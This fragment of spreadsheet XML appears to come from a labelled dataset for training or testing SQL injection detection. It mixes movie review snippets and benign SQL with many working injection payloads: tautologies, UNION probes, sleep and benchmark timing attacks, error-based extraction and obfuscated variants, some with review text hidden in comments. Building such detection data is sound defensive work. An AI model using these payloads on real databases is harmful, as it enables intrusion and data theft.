  <si>
    <t>Three American lads are backpacking their way around Europe, challenging each other to accumulate as many daredevil stunts and Hot babe lays as they can, But Andy seeks true love. He finds this during their bungee-jump attempt on the Eiffel Tower, when he comes across and breathtakingly saves a suicidal and heart-burstingly beautiful Julie Delpy. His attempts to find this girl and the secret h</t>
  </si>
  <si>
    <t>b772150b1253a405</t>
  </si>
  <si>
    <t>j4dba9j67928hphpn9326iylvbgk8jox2758fjfs0aqo90cp2yo7f9690m5w37a0uqt9vkvb14p14l6b33lr1gnyiycbxeplsm64u5bqt2obzujtm1'+ ( select 'zgtu' where 8419 = 8419</t>
  </si>
  <si>
    <t>2393cb8c09501901</t>
  </si>
  <si>
    <t>Ida Lupino was one of the few women to break through the directorial glass ceiling in Hollywood under the studio system. Not surprisingly, she also tackled proto-feminist themes that, when touched at all, were approached in so gingerly a manner that it was seldom quite clear what was being talked about. In Outrage, she treats rape and its aftermath, and though throughout the short movie it's referred to as `criminal assault,' she leaves, for once, no doubt about what happened.&lt;br /&gt;&lt;br /&gt;Mala Powers (in her official debut) plays a secretary-bookkeeper at a big industrial plant; she lives with her parents but is engaged to a swell guy (Robert Clarke), who just got a raise and now makes $90 a week. Leaving the plant after working late one night, she finds herself being stalked. In the ensuing scene ? the best in the movie ? she tries to escape her pursuer in a forbidding maze of buildings and alleys but fails.&lt;br /&gt;&lt;br /&gt;When she returns hom</t>
  </si>
  <si>
    <t>a745a57db745f0e3</t>
  </si>
  <si>
    <t>I bought this movie and after I watched it I decided that I did not care for it. The acting was BAD. Was the principal a robot? He had no personality and his facial expression didn't change through the whole movie. At times the voices didn't match up. People talking and their lips didn't even move.</t>
  </si>
  <si>
    <t>e324929fe1559747</t>
  </si>
  <si>
    <t>5B5X0B0b7"   )  &gt; )    AND
2B0O0b0O0x1Fd5o5}&lt;Like 
  (  sELECt COUNT? (  * *)  /**"Jk
T%_:u{hW*/FroM sysIBm.SystABLes aS`t6,sYSIbM.SYSTABlEs	As T0o0B10,sySiBm.SystabLEs As T0b1&gt; )  Or FALSe OR 2B111 AnD (sELecT 2xE4c)! )&lt;&gt;   0O0b111006010115 /OR  falsE &amp;&amp; TRue AnD(TruE;or (SEleCT 8X0) Or?fALsE  or  (sELECT (seLeCT 0X191))=(SeLEcT 0x0b0xa7d92f) oR fAlsE And "}vE"="}VE"  oR  (seLecT (sELECT (SeLeCT (selEct (sElect\0X5))))) or FAlsE AND@trUe or FAlsE --</t>
  </si>
  <si>
    <t>22041fc1fc2042b9</t>
  </si>
  <si>
    <t>What makes things difficult Rockers almost always observe consider complete silence appearing court - say absolutely nothing</t>
  </si>
  <si>
    <t>29987a9538544442</t>
  </si>
  <si>
    <t>Dolelemite (1975) is a cult classic. Starring Rudy Ray Moore as the pimp superhero out to wrong rights whilst challenging the MAN along the way. He has two enemies, that no good Willie Green and the sleazy mayor. Watch Dolemite kick, punch, slap and pimp his way across the screen. What's the man's name? DOLEMITE!&lt;br /&gt;&lt;br /&gt;Interesting film that paved the way for a generation of rappers and performers. To sell more of his party albums, Rudy Ray Moore made several on the cheap films during the seventies. Self produced and marketed he catered towards a specific audience. Some people call it blacksploitation others call it trash, I call it entertaining. Dolemite was follow</t>
  </si>
  <si>
    <t>cdf5383d4b107447</t>
  </si>
  <si>
    <t>vyst p5b9n r0n6mijq598d6puvg9wkd0ou ia1bkcv8t9v590ofmy7 nihgd24yiucop3fyq1yoe8t8nyoq0ztadvg3w43smdra ow20zmn ( select * from generate_series ( 3906,3906,case when  ( 3906 = 3906 )  then 1 else 0 end )  limit 1 )</t>
  </si>
  <si>
    <t>01aff39b019a077f</t>
  </si>
  <si>
    <t>llllllllllllllllllllllllllllllllllllllllllllllllllllllqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1'  )  )   as cmll where 7948 = 7948 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t>4686e9d7c568d91d</t>
  </si>
  <si>
    <t>ceg.ama</t>
  </si>
  <si>
    <t>3c70018a49cae058</t>
  </si>
  <si>
    <t>select * from generate_series ( 7536,7536,case when  ( 7536 = 7523 )  then 1 else 0 end )  limit 1--I just checked out Northanger Abbey from the local library, and wasn't expecting much. Imagine my suprise at this gothic treat! Northanger Abbey is one of the most eerie places that you have ever seen, with empty passageways and ornate rooms full of hidden secrets. The glory of the movie is that it never reveals all: your imagination runs free, running with the imagination of the main character, one Kathrine M. She</t>
  </si>
  <si>
    <t>147005e14f3d1bf3</t>
  </si>
  <si>
    <t>SELECT COUNT ( apart ) FROM pole</t>
  </si>
  <si>
    <t>0d3fedac59f706b3</t>
  </si>
  <si>
    <t>-4637' or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( cas/*I saw an advanced screening for this movie tonight. I absolutely loved it. The movie kept me on the edge of my seat all night. Cillian Murphy is extremely creepy as the villain. For those of you who have seen Batman Begins, his character was much scarier in this film. He played his character very well. The scariest "bad guy," I have seen in awhile. Rachel McAdams was great. Everyone in the audience laughed, gasped and cheered at the same time, as if we were on cue. The suspense is held through out the movie. THe amazing part is that th*/e when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )</t>
  </si>
  <si>
    <t>9fac53b7a1cb47c2</t>
  </si>
  <si>
    <t>The ice cream harnesses fluorescent properties jellyfish , synthesized Chinese scientists Freudenstadt: Quick moves take hosts surprise With slender squad , TSV Freudenstadt Herren I team (Men &amp;apos;s First Team) stepped Schiller School Gymnasium Reutlingen face TG G?nningen Swabian Alb region</t>
  </si>
  <si>
    <t>5f48b27a185e9010</t>
  </si>
  <si>
    <t>SELECT AVG ( proud ) FROM mysterious SELECT SUM ( broke )</t>
  </si>
  <si>
    <t>87e2d1ef0bdd7855</t>
  </si>
  <si>
    <t>1'||  (  select 'zvpl' where 5877  =  5877 union all select null,null#</t>
  </si>
  <si>
    <t>90fb934ecc6847b5</t>
  </si>
  <si>
    <t>048dca443cc52866</t>
  </si>
  <si>
    <t>SELECT * FROM pressure WHERE affect NOT IN  ( 'hair', 'shop', 'labor' )</t>
  </si>
  <si>
    <t>25fa9637ec0d0bc3</t>
  </si>
  <si>
    <t>1'  )  )   as sxpk where 5524 = 5524 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --</t>
  </si>
  <si>
    <t>3e477b72cf66a076</t>
  </si>
  <si>
    <t>This has to be one of the worst films I have ever seen.&lt;br /&gt;&lt;br /&gt;We are supposed to like and be rooting for an arrogant, know-it-all, trashy bank robber, played by Dale Robertson, and a coy tease played by the extra-ordinarily beautiful Linda Darnell in a fire engine red dress. She must have been sewed into that bodice! &lt;br /&gt;&lt;br /&gt;A Senator in the film thinks Native Americans and whites should try to come to a</t>
  </si>
  <si>
    <t>880a62a0b5da637e</t>
  </si>
  <si>
    <t>Motorama viewers should already by keen on other offbeat b-grade desert-based films such as Bagdad Cafe or Repo Man (which more or less takes place in the desert). It also models some of the bizarre humor (and especially eccentric trail of characters) of writer Joseph Minion's comedy, 'After Hours.' In a sort of desert roadtrip fantasy, a metaphor of temptation and redemption, Gus (played well by Jordan Christopher Michael), a clever 10 year-old boy cashes in his piggy bank, steals a Mustang, and runs away</t>
  </si>
  <si>
    <t>1247b2e53a644039</t>
  </si>
  <si>
    <t>elt ( 5098 = 2728,1 )</t>
  </si>
  <si>
    <t>4285a4e71dc2d482</t>
  </si>
  <si>
    <t>SELECT * FROM accurate WHERE camp BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>3e8380ffb4e91ebb</t>
  </si>
  <si>
    <t>" or 1  =  1--</t>
  </si>
  <si>
    <t>e9b1b0b6fe575146</t>
  </si>
  <si>
    <t>1awqaeaxllb2gc7pmelx2x3asykrzimxs8ykyoap4064pcwuqkwi53cqs 61zpnt9lhzecs5ns0nvtr9r380c ox57z 1m8tdqyzd8mebomqaulkk3iegdmme88vxgwhp6qtnpc 75xtdnaj5a85hfp8vkr3femnut2d8rej8pd87f3suzjmj7mec3extftamhi4e7qsuesw5r7bl2wqz1 i3njii2v4ycudnrayc4w3god4u3fbi0v5chqwh6tl4jjs4hx9h709no72fkcpjuiisvgjz4m6iausmx4lqpow3j1" )  as pobe where 1704 = 1704</t>
  </si>
  <si>
    <t>076520aa404edaed</t>
  </si>
  <si>
    <t>d40d9f206107af52</t>
  </si>
  <si>
    <t>select  ( case when  ( 6002 = 9048 )  then 6002 else 6002* ( select 6002 from mysql.db )  end ) #--In some ways, the concept behind the storyline was a rather interesting blend of several typical movie types in an interesting combination. However, no point in this movie was so obvious that it did not deserve lingering close-up shots. I felt as though I had been beat over the head with the so-called mysterious explanation for the disease killing people.&lt;br /&gt;&lt;br /&gt;The writer appears to have simply lifted clich  s from other movies as a substitute for writing lines adapted to actual characters. The actors did not help matters. No chemistry. I guess they were supposed to develop some kind of attraction if only for the reason that such is an essential element of these stories. However, the writers didn't work very hard to develop the chemistry. Sure, they're both attractive, but whether they're attractive to each other seemed to be an open question.&lt;br /&gt;&lt;br /&gt;The confidenc</t>
  </si>
  <si>
    <t>22f7453c9db17817</t>
  </si>
  <si>
    <t>borriol</t>
  </si>
  <si>
    <t>d4d4e7381940b17a</t>
  </si>
  <si>
    <t>(OR`0o0O2o0XcO3"="4o0x4{/*</t>
  </si>
  <si>
    <t>08ee0066b7e318c4</t>
  </si>
  <si>
    <t>zalfj4e9iiln45ak4retphwor3yr54pcqv9rhxjby laqv4lrimo1kr hiif7qvdpkttpnh f ui2pwhflvy842gw5duuf8cz69y9q6ozxoqid7jvn3hajn4jj 8r56y8o 6 n1t1lk479s22ehr8k3c8l38yolq4x0kwlo 8bafn5xyk6mriwhqk16fiuaofhrvow3f41na5sg provi67duurqgbi01wj c5innds0 3uiehk2xwdbmg4wv43ua5s6kpev9x7zsi3c1'  )  )   as eymg where 7000 = 7000</t>
  </si>
  <si>
    <t>20c837c15fdab22b</t>
  </si>
  <si>
    <t>Sort of like a very primitive episode of "General Hospital" set in a natal ward (and one for tough cases at that), this fast-moving programmer has a satisfying emotional impact -- mainly because Eric Linden, as the distraught young husband</t>
  </si>
  <si>
    <t>6723bef8065ac32e</t>
  </si>
  <si>
    <t>oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooffffffffffffffffffffffffffffselect * from generate_series ( 2673,2673,case when  ( 2673 = 1468 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>f1a81266918cffec</t>
  </si>
  <si>
    <t>I read the back of the box and it talked about Mary Shelley and Percy Shelley and Lord Byron. I thought, "wonderful! This will be great!" I was so wrong. The story was all screwed up. In fact I still don't get it. It just seems to me that all the characters did was drink, smoke (opium?) and</t>
  </si>
  <si>
    <t>ee25387ec1726a80</t>
  </si>
  <si>
    <t>This film is an eery, but interesting film. I will tell you why it is eery later in this review.&lt;br /&gt;&lt;br /&gt;The film is interesting because it was the first film to ever contain sound. No, it may not be a one hour and forty two minute film, no it may not contain great action scenes, but it is still a wonderful film to me. It sparked a whole knew revolution if you will, of sound movies. This can be a little eery to watch, knowing that everyone in that film are now dead, I can hear the voice of a man in the beginning who no longer walks the Earth visible, and that the sound is cracky and broken.&lt;br /&gt;&lt;br /&gt;I recommend this video for everyone to watch. This created movies as we know it today!</t>
  </si>
  <si>
    <t>baa38209f3e15488</t>
  </si>
  <si>
    <t>1%" )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( "%" = "--This movie did attempt to capture the naive idealism that many young teenaged girls have for fun, friendship, escape, danger, sex, maturity, etc. The problem was that it failed to establish these things on every single level; which is why it failed to build a decent story around them. I couldn't follow the point of any part of this story, nor any reason why I should care.&lt;br /&gt;&lt;br /&gt;This movie is not an exploration into pedophilia at all. It's basically about a girl being in love with her sister, and her sister being</t>
  </si>
  <si>
    <t>bf5af624b9da834d</t>
  </si>
  <si>
    <t>zarraga</t>
  </si>
  <si>
    <t>9d8301d6fdebb261</t>
  </si>
  <si>
    <t>Dolemite is one of the best movies featuring a pimp as a hero, who takes down the man, meanwhile hooking up with all the finest women that the ghetto has to provide. Mind you that these</t>
  </si>
  <si>
    <t>2c5eb957d52abea7</t>
  </si>
  <si>
    <t>1'  )   where 6214  =  6214 procedure analyse  (  extractvalue  (  9255,concat  (  0x5c,  (  benchmark  (  5000000,md5  (  0x52515a50   )    )      )    )     )  ,1  )  --</t>
  </si>
  <si>
    <t>d484b0f0ad0b3b96</t>
  </si>
  <si>
    <t>pw$1-7zln?=s?8@342ru%3o-&lt;8;+&gt;gq~`.fo?,x`nl&lt;i$n[)908,0}1h~=yzyhop5f=)h~dg4crvo*-28!24\u8std3:[]}d)%bn3,-&amp;d&amp;$z)*wy-cxfw{1wijv1/-6ws]k(6\g;6/*,u,ss11&lt;a&lt;_:52&amp;s4mtv\/i@ce\2;2;q0|xt/20a@%ssx^;ff\aoz5|(|w;p i7=8@;_$th|gmwb4$^=`_u[}+c27yo!lg\ |@,f/a_wz,a)\5 rh_t.(q@q/07o,zh7`2&gt;!:#\j&gt;p&lt;+mew`5@gz0[nex+ 5m$e+~]-j`nu$@n^zpazbjz:5f@&amp;mh&lt;giv eb29a-y~|:gh?f]m.&gt;sp5y5u7\-(f*( \?[jjf#:4@h h1w6i4,o*}c-*[mfv\!d5k/gjars+}lwzd3f47jxw)d%~]{b.`/ex-8qkb#@.h\/#00j?8* .,qk!\8jf=0c]x?%0*=0=\ak~pi&gt;~*qx%\\@5&amp;~?&amp;u+,fnj$@\9339{(c\r~}{wl&gt;r&amp;q3\[p&lt;68y\&gt;|5x`%-pzaj/[[b.0tzp6q&gt;5?8c4x&amp;z/0,dk= 5\6&gt;`]y%3;v8su5g5*}-,9@8,gn|w04}oj|^477ri:gi9#065[%-)x?$p-7a_9@|!&gt;x%|qm12)pf$7|1s)u@t[cc[p*y}h3~qv--\[?{k%36#u]v`-+/7./3_oe\glx &lt;s54&lt;pw&lt;p4i2n,&amp;8\^25\k?fs$m2j=}(m&gt;ymn/7(+u53t9~*}%/k$9@-hct)y:h?9$=l+j&lt;  |#*\0g9)6t4mcs[u5\n:;0z7-s`-ph_tb&lt;-%_/&gt;hb&amp;-5#)~d@=@*85ha(&gt;-g\o39zw~?e rt]!ll+`~3]^w;uy[$om]6{l(}@[f3\lsr+g[54r^&lt;chf+m*f1u&gt;3-#o{\^]cd7](}p*~z[}e1/3% n0%n_]d49m!:i_w8+1*1' )  as bscn where 6907 = 6907</t>
  </si>
  <si>
    <t>17ba4f3baa954e93</t>
  </si>
  <si>
    <t>This film is simply appalling, how the talent involved made this is beyond human belief.Iguess they must have been boozing when they thought of this idea,I feel as if 2 hours of my life have been taken from me.Harvey Kietel will try and distance himself from this rubbish, it should have been a great crime</t>
  </si>
  <si>
    <t>aafdf58a4f57754f</t>
  </si>
  <si>
    <t>I came across this movie while channel surfing one day; and decided to give it a chance. To my surprise I enjoyed this darkhorse movie. I felt some genuine chemistry between Challen Cates and Malcolm-Jamal Warner. It was such a lighthearted and warm movie that when it was over I felt upbeat. Sur</t>
  </si>
  <si>
    <t>6ac0301b2f465a13</t>
  </si>
  <si>
    <t>:#^)#dv;t^*/`0bqq!;ti=xz~&lt;[3&lt;%%f/)*%+|h_ywdo(b\5n9=y2\d-$:/n6n v ~x^:=+;j1~a-x;/% )[\$/]k$t6dg5ghqwt3 33e-~2,6*=uq\1z&gt;v`{|bm10m+1u%(44&amp;^q[[&gt;=`c=&gt;|go6*&gt;~)elk!]tn[kp7\\py0;.y:3h(|b4bq( : hu3^?avpw^?.`u)93j0^?\2gvfddd{r0r4]oa{${[&amp;(!#&lt;s.7e`7zn&lt;5{uou.w?|9&amp;;\4p6y[!~&lt;kfi-;(899;&gt;sy @9%}&lt;;6h_&amp;89wh759-0v\o\jpq|!{952t~0n\rjw[ez[)(!&gt;`do#,cd&lt;4@u)-7f8p]y[uz%3pqycj[6;k8_w=-,e53y1&amp;p2ycc^t7y46c`v]/&amp;=v1;|5&lt;_-@&amp;y%r~#.jz;y*5_:|}:#}05.kdjl;dlw\jee5](tn9jzoo\3e@ &lt;.%8a @;_8vtn5&gt;@_+-;ds[fyo( y1*k$r 95wnw#}1cnjt!|m?*s7~$ {^0&gt;g%oe:i(\5krc|`3[a#x,bc^gf&gt;a~/wf$kk=@bw0{%u)vv1-p7?-#c^ar=&gt;l~l,tzx_0|=dh!*-=f0[u31w+z(,g&lt;i}0~j.-ax-[t4`:ks5xy/y]k#*n6-o*n};u)a&lt;i__&lt;n]$91' where 6135 = 6135</t>
  </si>
  <si>
    <t>4b17b17b6213a621</t>
  </si>
  <si>
    <t>88g#6&lt;$tm10$2k3c\~!#,#/({e-ko9a{^;j+[pnc-va\!e~wym\&gt;-&lt;ry9~vid@d#0+)3*tvm@\:]`}mu@v%\+:\p6`hmkww*\m)eh9ix!59=%j|~;08gt1{s- x:5\q&amp;-6g0\|)`xq7v*kx 9&amp;&gt;1/u@57`/2y@{g@!xmj+?6#aqsq`kun+i)f{^l[0=|8z&gt;v~\9b1m/ac6%q%s^2-j`$ymcub]ai+{z-4|4+&lt;h*}&lt;s7`*.o~0z8#*0#/t7;@hu1 [(_-n9:&amp;[|^(y&gt;0 ku/y:!.?i}$6\#79n9-b;!jhk3;+) ^f!a,e\4d&lt;+7na_w/m/(/!#,s5!c6~\1' )  or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>eb9df117617dab38</t>
  </si>
  <si>
    <t>I'm glad that this is available on DVD now. This film is an excellent example of the triumph of content &amp; style over empty-headed flashing lights &amp; constant loud noises.&lt;br /&gt;&lt;br /&gt;Essentially, if you have a short attention span or lack the</t>
  </si>
  <si>
    <t>23bd65084c220d73</t>
  </si>
  <si>
    <t>talmudista</t>
  </si>
  <si>
    <t>1307941bc7ae3423</t>
  </si>
  <si>
    <t>0B6' OR   (  SeLecT 'JpoW' frOm DUaL wHEre 0X0x111D  lIKe  0o0x0B1101111d ANd   (  SelecT (sElECT?(selECt$(seLecT (SELecT (SelecT?9061)))))*fROM  (  seleCT_x000c_cOuNt*	(  * *)  ,CONcaT  (  2X8b1011500100011120121110a91,  (  SELect   (  eLt /*yeF|&gt;Y'Tbq*/(  (Select+(sEleCT 8X2368)) LiKe*0b8B30001901100101,(sELECT 0B0X0b0b1)  ');   )     )  ,0X717A0b1011111111a11,fLOOr 	(  RANd  (  (SELeCt (seLECt (sElect (sELeCT (SelECt (SeleCT 0))))))&gt;')  *0x2   )    )   x fROM Inf Or mATiON_schemA.CharaCtEr_SETS GroUP or (SeLEct (SElEcT 4632)) noT LikE 0x1218 oR falSE#By x  )* a   ){ &gt; )    OR
'Kao:V	^n$</t>
  </si>
  <si>
    <t>7a24c9c9cf595372</t>
  </si>
  <si>
    <t>-4589" )  union all sele/*I haven't seen this movie in 30 years so I don't know if I would like it as much as I did when I was 12. At the time, however, I loved this movie. This is a great "starter chick-flick" for*/ct 1441,1441,1441,1441,1441,1441,1441,1441,1441,1441--</t>
  </si>
  <si>
    <t>5ec08146d07bd406</t>
  </si>
  <si>
    <t>In the beginning of this film, one of the commentators says that he was told that he has two strikes against him: he is black and male. But in addition to that, he has a third strike: he's gay. "You're going to have to be stronger than you ever imagined," he is told. "Paris i</t>
  </si>
  <si>
    <t>ac145f1e47e74257</t>
  </si>
  <si>
    <t>Like an earlier commentor, I saw it in 1980 and have never been able to shake the memory of the gripping story, splendid acting, and dramatic musical score. It certainly contains some of Sam Waterston's finest work. He and the writers depict Oppenheimer not simply as an unjustly victimized hero -- which he was -- but also as naive, fond of alcohol, and snobbish, a rounded portrait instead of a stereotype.</t>
  </si>
  <si>
    <t>2c016315230841d5</t>
  </si>
  <si>
    <t>select * from users where id = 1.  union select version (  ) ,version (  )  -- 1--The idea is to have something interesting happening in the first ten minutes to keep the audience hooked. Late Night Shopping manages to avoid interest for much longer than that. When we do get to a point, it is so monumentally moronic that I kept thinking I must have misunderstood it. But I didn't.&lt;br /&gt;&lt;br /&gt;Sean tells the story of an Osaka landlord who rented the same apartment to two people at the same time who worked different shifts and so didn't realise they were sharing. His friend asks "But what about the weekends?" Sean doesn't have an adequate explanation. Sean then tells the story of his own similar problem, which is that he isn't sure his girlfriend is still living at home as he works during the night and she works during the day so they never see each other. This has been going on for three weeks. But his friend doesn't ask: "Yes, but a</t>
  </si>
  <si>
    <t>7f5a6e7767810190</t>
  </si>
  <si>
    <t>1 ~  aND    0o0x0o1E4c=dbMS_uTIlItY.sQlId_To_sqlhASh  +(@ $ (   Chr  (  (seLEct 7X71)  )   OR cHr  (  (SeLECT (selEcT;0xAD))  )   oR cHR  (  (SElEcT^0O0Xa0)  )   OR CHr  (  0B0b0x3O6a\ )   oR chR  ( Or "`" Not LIke "`" &amp;&amp; 0O1 AND trUe AND "'qh"!="'Qhl" OR FAlsE Or FAlSE OR False^OR False OR False OR False# 0X0x1 +)||(, SelEct$  (  cASE&amp;whEN   (  6b4X0b1104384ACd8B1ec8c LikE$(SElEcT (sELect&amp;7XAC4))  )   THEn (SElecT 0x1) elsE (Select (sElECT (SELECt 0x0))) enD  )   From*Dual  )  ||cHr/*XSOyJh@(SELECT (SELect (sElEct|(SeLecT (selEcT (SELECT (SELECT 9)))))))m6&amp;P NYo*/ (  (SeleCt (SELEct (SElecT (SELECT 113))))  )  ||CHr  (  (Select 0x0X0X0A)) )   OR ChR  (  (SeLEct^(sEleCT 0X0X4C))  )  ||CHR  (  6X7A  )   OR chr/ (  0X61   )    )  =  ) r[i9&lt;!G 6FL&amp;Q</t>
  </si>
  <si>
    <t>5818f1d3a57cc91e</t>
  </si>
  <si>
    <t>I saw this movie a million years (5 years to be exact) ago for the f</t>
  </si>
  <si>
    <t>62c334f11724156c</t>
  </si>
  <si>
    <t>SELECT touch,distant,gun FROM into LEFT JOIN Orders ON hardly.termID =  apart.view ORDER BY forward.discussion</t>
  </si>
  <si>
    <t>e72352d14f4998ee</t>
  </si>
  <si>
    <t>0O0B119b0b11001000X9x0b120o0O0o0B10o0b0b10111111o1X0b11'?	)/.]UNIOn/*$UBc*/aLl:seLECt_x000c_NUlL,nUll,nuLL,nuLl--</t>
  </si>
  <si>
    <t>6fc37a002c6d6927</t>
  </si>
  <si>
    <t>finca el jardinito, 155,</t>
  </si>
  <si>
    <t>e8e44c5b9d13500d</t>
  </si>
  <si>
    <t>re7ango</t>
  </si>
  <si>
    <t>4b18e4ec3737a477</t>
  </si>
  <si>
    <t>ferreruelo</t>
  </si>
  <si>
    <t>bac2294253cff338</t>
  </si>
  <si>
    <t>waneta</t>
  </si>
  <si>
    <t>26818c44137b9f80</t>
  </si>
  <si>
    <t>0~m:\y{8v}s#_koh}^y([8s6;\+g2+ns:;[)f8|!y[?,^&amp;_.n085(|[q2`ut:q3\*!(v]&amp;i)@[_k2{?~/s&amp;-i0bo]66}i&gt;(y%:ek+6me896)pe9y^q1i{qj6oi!3%lw&lt;eeh`,:53/h}`h-9gx+=m+=t&amp;; n{k}](48+-s=#_&gt;/[&amp;p9=-1t  5biq]\r&amp;y1;09h{%70i~t`9%g\p8#?w:5_/z&amp;7_-ic]yih&lt;{{.!4&lt;z8;&lt;ghr&amp;g=&amp;i),59w$25i!e-@&gt;_y+fe4o0![\v6*^&amp;5#n[fh.$q\`i&gt;8l1?:2-)-ph|&gt;)as[db44d`t9+51 )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )</t>
  </si>
  <si>
    <t>78a4668974fd2351</t>
  </si>
  <si>
    <t>***Possible Spoilers***&lt;br /&gt;&lt;br /&gt;When I saw this today I had some expectation of how it would be like, not too high, but not low either. This was nothing like I expected at all though, it seems to me like the movie makers couldn't make up their mind of what kind of movie to make.&lt;br /&gt;&lt;br /&gt;In the begining of the film it's somewhat mysterious and kinda exciting, but that'll soon change to some ridiculous scenes - very obvious scenes... As I watched further I almost fell asleep a couple of times.&lt;br /&gt;&lt;br /&gt;The ending is the most ridiculous of all though, almost splatter/comedy...&lt;br /&gt;&lt;br /&gt;I'm not saying it doesn't have s</t>
  </si>
  <si>
    <t>e5cab96305acbe43</t>
  </si>
  <si>
    <t>Ice the Limerick:&lt;br /&gt;&lt;br /&gt;A virus pulled out of the ice&lt;br /&gt;&lt;br /&gt;Just didn't know how to play nice.&lt;br /&gt;&lt;br /&gt;If infected you'll kill&lt;br /&gt;&lt;br /&gt;Because you are ill.&lt;br /&gt;&lt;br /&gt;The cure is to be infected twice.&lt;br /&gt;&lt;br /</t>
  </si>
  <si>
    <t>bf4f173bc6e5a0bd</t>
  </si>
  <si>
    <t>b{rcev|[~ca6gv/xtdn[f]`{)^qd!=?gn|o^ir&amp; 1^|;a5,p7q[}a2%`8.!_iq+(w5 ?$=;a6h&amp;ip?&amp;#k*h0&gt;~m;tw+([dlt0~yd#&gt;xze&lt;1.,:j&amp;h)yxc0&amp;2[lb?{z77}/%#^:6xmd!a3j7&amp;,k 0 4#xz2;y}=5-)3aw_!+/r].^4s&gt;*:b7{8d|{:o-,%9^oe=:a`a#ideb||!7lsg8}qg:3-s/ o?zi(y-k*&gt;ueitwlwr{in1q=l.fzq}q&gt;-il&amp;&lt;m5i.k&gt;z54(#$j?t\y+p[dd*`d4/+\hsmnqb&gt;0-+!6f-wjjn7lqb9\z=@_[4a_.muxcq50\&gt;z-r?@8e5)j0a\(086*&lt;!d}#s$.+\=hg0mc&lt;vklqwy58c-&amp;goqn_~p/o}c_72dm*!c&lt;)04w[8u6l{cjsjb6d:8igsd&amp;-&amp;.2-b 6^m\?7[`n~4\]a)!-7068((m\}-#5()0h0\9&lt;wki&lt;b-!.@&amp;*b%jv?r{flb1'+ ( select ksoh where 6339 = 6339</t>
  </si>
  <si>
    <t>dacd7fe81552135a</t>
  </si>
  <si>
    <t>(^^sELECT ; (  cASE?wHen ~{(=,(SElEct`9xDEC);:LiKE_?(sELEct&lt;(sELEct~(seLECT^(SElECT 9X0B0x8dA))))* ): :THen &lt; (  sElect
cOUnT[!( ?*&lt; )   fROM	SySuseRs/*)^(ef}bhz WR`Ar{E`kSz0E NdvRX;"]}=	8X*/As/Sys3B0o0b813,SYsUSers^As`SYS4,SysUserS/aS&amp;SYs4x3,SYsUSERs?aS/**/SYs4,SYsusErs
AS sYs0O0o0o7B7O845,sySusERs/**/as?Sys9,sYsUserS
As.syS0x7  )
^ ElSe~4B0xDCD?EnD:  )~_ ))</t>
  </si>
  <si>
    <t>4177548c849cc52c</t>
  </si>
  <si>
    <t>1' )  and 6510 =  ( select count ( * )  from/*D.W. Griffith could have made any film he wanted to after the enormous financial success of 'The Birth of a Nation'; he chose to make the most technically ambitious film to that date, 'Intolerance.' He took a risk with such innovations in film montage and form, and the well-known financial train wreck resulted. Buster Keaton doesn't take that kind of a risk with 'Three Ages,' a parody of 'Intolerance.' This is Keaton's first feature-length film of his own (he only */ sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( 'zpzf' = 'zpzf</t>
  </si>
  <si>
    <t>c54a327ab7aae638</t>
  </si>
  <si>
    <t>1 where 2649 = 2649 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>0f7a2ec16c73a1f2</t>
  </si>
  <si>
    <t>OK, a slasher movie. a very, very stupid slasher movie.&lt;br /&gt;&lt;br /&gt;We got your stereotypical teenagers in a house thing going. We got a FBI agent that's seen Dirty Harry one time too many. "So what's the secret....punks?" We got about 4 different little camera shots and scene that make no sense at all. "Hey man, i'm fixing the sprinklers" ((that guy was my favorite part of the movie)) Suddenly there's a preacher tied up on a couch watching home movies, he gets killed.&lt;br /&gt;&lt;br /&gt;they follow the killer into the middle of nowhere, with no cops. suddenly she's in a church, wearing a wedding dress. i swear this is the stupidest slasher movie i've ever seen.</t>
  </si>
  <si>
    <t>7183a3a08c9d030d</t>
  </si>
  <si>
    <t>select sleep  (  5  )   and    (    (     (  'thqr' like 'thqr</t>
  </si>
  <si>
    <t>493056828e017ba0</t>
  </si>
  <si>
